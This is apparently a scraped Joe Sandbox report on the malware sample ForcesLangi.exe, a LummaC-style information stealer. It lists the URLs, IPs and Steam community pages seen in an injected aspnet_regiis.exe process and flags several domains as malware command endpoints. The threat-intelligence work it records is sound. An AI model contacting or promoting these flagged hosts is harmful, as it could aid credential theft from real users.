                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lev-tolstoi.com/api_qaspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://lev-tolstoi.com:443/apiZaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://prisonyfork.buzz:443/apiaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          		unknown
                                                                                                                          https://support.microsofaspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/about/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://help.steampowered.com/en/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/market/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/news/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://lev-tolstoi.com/apiQ0O0qaspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://lev-tolstoi.com/apilaspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    		unknown
                                                                                                                                                    https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/stats/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://lev-tolstoi.com/?#aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              		unknown
                                                                                                                                                              https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://lev-tolstoi.com:443/apiBaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=easpnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/workshop/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_caspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/legal/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lev-tolstoi.com/apiAaspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=easpnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://appliacnesot.buzz:443/apiaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://lev-tolstoi.com:443/apiaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://lev-tolstoi.com:443/apipiaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://store.steampowered.com/account/cookiepreferences/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        104.21.66.86
                                                                                                                                                                                                                        		lev-tolstoi.comUnited States
                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        92.122.104.90
                                                                                                                                                                                                                        		steamcommunity.comEuropean Union
                                                                                                                                                                                                                        		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1581499
                                                                                                                                                                                                                        Start date and time:2024-12-27 22:37:07 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 5m 15s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:ForcesLangi.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@11/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                                                                                        • Number of executed functions: 36
                                                                                                                                                                                                                        • Number of non-executed functions: 107
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: ForcesLangi.exe

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        16:37:55API Interceptor10x Sleep call for process: aspnet_regiis.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                        92.122.104.90Leside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                            UMrFwHyjUi.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    http://sneamcomnnumnlty.com/fact/actual/getGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://u.to/xjPiIAGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        https://sueamcoommunnlty.com/geting/activeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse

                                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            lev-tolstoi.comLeside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            MaZjv5XeQi.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.66.86
                                                                                                                                                                                                                                            steamcommunity.comLeside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            T4qO1i2Jav.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            FXdg37pY22.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            k0ukcEH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 23.55.153.106
                                                                                                                                                                                                                                            8WRONDszv4.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                                            • 23.55.153.106

                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            AKAMAI-ASUSLeside-.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 92.122.104.90
                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.121.10.34
                                                                                                                                                                                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            • 23.57.90.162
                                                                                                                                                                                                                                            grand-theft-auto-5-theme-1-installer_qb8W-j1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 95.100.135.104
                                                                                                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                            • 104.73.204.126
                                                                                                                                                                                                                                            db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                            • 104.120.124.62
                                                                                                                                                                                                                                            pVbAZEFIpI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            GxX48twWHA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                            CLOUDFLARENETUSiviewers.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 104.21.60.24
                                                                                                                                                                                                                                            http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 104.17.25.14
